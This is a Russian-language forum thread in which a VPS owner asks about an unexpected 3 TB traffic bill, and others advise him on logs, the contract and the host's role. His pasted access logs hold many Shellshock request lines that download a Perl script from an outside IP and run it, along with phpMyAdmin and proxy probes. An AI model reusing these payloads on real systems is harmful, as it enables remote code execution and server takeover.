Огромное потребление трафика сервером

Тема в разделе "Администрирование серверов", создана пользователем vanderv, 18 апр 2015.

Модераторы: mefish, stooper
  1. vanderv

    vanderv

    Регистр.:
    30 май 2009
    Сообщения:
    270
    Симпатии:
    12
    Вчера получил письмо от провайдера, что мой сервер потребил трафика на 3тб. При том что оплаченным является только 30гб. Я честно сказать охренел от таких чисел.... Трафик превысил в 100 раз и они не приняли никаких мер... Выставляют мне счет на сумму почти в касарь. При том, что меры они приняли только спустя неделю (снизили канал до 10мбит). Получается, что всю неделю меня то ли ддосили, то ли что. Господа, как быть? Как проверить что это было? Как избежать такой не маленькой оплаты? Кстати всего на сервере инфы на 1гб.
     
  2. metsys

    metsys

    Регистр.:
    27 апр 2014
    Сообщения:
    477
    Симпатии:
    458
    экстрасенсы в отпуске

    логи где?
     
    Sorcus нравится это.
  3. mefish

    mefish Support

    Moderator
    • Супермодератор
    Регистр.:
    30 авг 2007
    Сообщения:
    887
    Симпатии:
    629
    Делаешь бекапы и переезжаешь к другому хостеру, оплату наврядле простят, а проблем добавят. Логи сдесь не нужны, т.к. их там скорей всего нету, на роутере нудно смотреть куда трафф шел. Как вариант брутеры или парсеры поставили или досилку, таких софтин хватает по линукс.
     
  4. vanderv

    vanderv

    Регистр.:
    30 май 2009
    Сообщения:
    270
    Симпатии:
    12
    Да уж точно не простят... и проблем будет, так как указывал паспортные данные и много другой инфы... В общем я вообще в асадке.
    Кстати а это может быть ихней ошибкой? так как на сайте написано:
    Последний месяц в дата-центре РУП «Белтелеком» наблюдаются технические сложности с предоставлением корректной информации о потребленном трафике. Вследствие этого мы вынуждены транслировать нашим клиентам не всегда достоверную информацию о трафике, потребленном виртуальными и выделенными серверами, размещенными на этой площадке.
    Как можно проверить, что это не ошибка? Сервер под Ubuntu

    Посмотрел логи, а там ппц что творится:
    Код:
    5.255.253.188 - - [15/Apr/2015:16:59:01 +0300] "GET /robots.txt HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +[url]http://yandex.com/bots[/url])"
    
    5.255.253.188 - - [15/Apr/2015:16:59:04 +0300] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +[url]http://yandex.com/bots[/url])"
    
    1.169.92.212 - - [15/Apr/2015:20:08:12 +0300] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 400 166 "-" "-"
    
    201.82.102.5 - - [15/Apr/2015:21:33:13 +0300] "GET / HTTP/1.1" 301 178 "[url]http://best-seo-offer.com/try.php?u=http://steelie.by[/url]" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    
    200.8.108.122 - - [15/Apr/2015:22:25:54 +0300] "GET / HTTP/1.1" 301 178 "[url]http://best-seo-offer.com/try.php?u=http://steelie.by[/url]" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
    
    174.143.147.9 - - [15/Apr/2015:22:46:29 +0300] "GET HTTP/1.1 HTTP/1.1" 400 166 "-" "-"
    
    174.143.147.9 - - [15/Apr/2015:22:46:34 +0300] "GET /cgi-bin/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:35 +0300] "GET /cgi-bin/env.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:36 +0300] "GET /cgi-bin/fire.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:37 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/hello.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/login.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:39 +0300] "GET /cgi-bin/main.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/meme.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/php HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:40 +0300] "GET /cgi-bin/php4 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/php5 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/php5-cli HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:41 +0300] "GET /cgi-bin/recent.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/sat-ir-web.pl HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test-cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test-cgi.pl HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    174.143.147.9 - - [15/Apr/2015:22:46:42 +0300] "GET /cgi-sys/php5 HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget [url]http://202.191.121.230/bou.pl[/url] -O /tmp/b.pl;curl -O /tmp/b.pl [url]http://202.191.121.230/bou.pl;perl[/url] /tmp/b.pl;rm -rf /tmp/b.pl*\x22);'"
    
    69.197.148.87 - - [15/Apr/2015:23:14:09 +0300] "GET /muieblackcat HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.87 - - [15/Apr/2015:23:14:12 +0300] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.87 - - [15/Apr/2015:23:14:12 +0300] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.87 - - [15/Apr/2015:23:14:15 +0300] "GET //pma/scripts/setup.php HTTP/1.1" 301 178 "-" "-"
    
    209.126.230.71 - - [16/Apr/2015:00:45:33 +0300] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 ([url]https://github.com/robertdavidgraham/masscan[/url])"
    
    1.171.68.149 - - [16/Apr/2015:01:14:36 +0300] "CONNECT 163mx00.mxmail.netease.com:25 HTTP/1.0" 400 166 "-" "-"
    
    61.240.144.67 - - [16/Apr/2015:02:04:45 +0300] "GET / HTTP/1.0" 301 178 "-" "masscan/1.0 ([url]https://github.com/robertdavidgraham/masscan[/url])"
    
    69.197.148.92 - - [16/Apr/2015:05:10:36 +0300] "GET /muieblackcat HTTP/1.1" 301 178 "-" "-"
    
    69.197.148.92 - - [16/Apr/2015:05:10:40 +0300] "GET //phpMyAdmin/scr
     
    Последнее редактирование модератором: 18 апр 2015
  5. _sergey_

    _sergey_ Писатель

    Регистр.:
    1 окт 2008
    Сообщения:
    1.746
    Симпатии:
    1.159
    Так в договоре, что сказано-то. Обязаны вы оплачивать трафик который вышел за пределы, внесённой оплаты или нет? Какие их действия при превышении трафа по договору?
     
  6. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.549
    Симпатии:
    1.431
    Это нормально, на всех популярных доменах, к которым имею доступ, в логах такая фигня от софта автопоиска багов.

    Так же каждый из этих ответов, всего лишь сотни байт, для того чтобы такими запросами сделать 3ТБ у вас должно быть 4к запросов в секунду! По логам такого трафика не видно. Да и мало серверов, которые на загнутся под такой нагрузкой
     
  7. vanderv

    vanderv

    Регистр.:
    30 май 2009
    Сообщения:
    270
    Симпатии:
    12
    Сказали, что я указал, сервер нужен без администрирования, следовательно они не следили за трафиком

    У меня самый дешевый vps:
    CPU 1 ядро
    RAM 1 GB
    HDD 20 GB
     
    Последнее редактирование модератором: 18 апр 2015
  8. metsys

    metsys

    Регистр.:
    27 апр 2014
    Сообщения:
    477
    Симпатии:
    458
    по факту - конечно печалька.
    В таком случае у Вас начинается этап трений с провом. Перспектив решения в Вашу пользу ничтожно мало, но можете попробовать:
    1) Оспорить договор (который у Вас есть?(!)) - а именно: вы оплачиваете законтрактированный объем траффика - 3ТБ. Меры, которые пров не придпринял по ограничению - не ваша проблема, что они не отключили.
    2) Обвинить их в преднамеренном завышении показателей (вполоть до ручной накрутки счетчиков в базе, доступ к которой только у прова ).
    3) Писать заявление в органы (с нулевой вероятностью решения в вашу пользу) на мошеничество со стороны прова в целях защиты от обвинения Вас в неоплате якобы потребленной услуги.

    Уверен, современное законодательство любой страны СНГ очень слабо регулирует отношения в сфере IT, так что перспективы оценивайте сами.

    зы
    а на самом деле никто не обязан следить за уязвимостью предоставленных вам ресурсов кроме Вас. Так что то, что Вас хакнули - это не проблема прова. Думаю в данном случае он хочет воспользоваться (возможно и обоснованно) Вашей неквалифицированностью/рапиз"№;вом... итд
     
    Последнее редактирование: 18 апр 2015
    Sorcus нравится это.
  9. _sergey_

    _sergey_ Писатель

    Регистр.:
    1 окт 2008
    Сообщения:
    1.746
    Симпатии:
    1.159
    Мне кажется администрирование к билингу никакого отношения не имеет, после обнуления счёта, доступ к серверу должен быть прекращён. И интересно как это прописано там в деталях. В общем платить только через суд.
     
  10. vanderv

    vanderv

    Регистр.:
    30 май 2009
    Сообщения:
    270
    Симпатии:
    12
    Да, но это идет как доп услуга. Я почитал договор, там написано что необходимо оплачивать в течение 15 дней после выставления счета. А выставили счет они мне вчера.
    Но чисто по человечески мне тоже не понятно, как они позволили влезть клиенту в такие долги.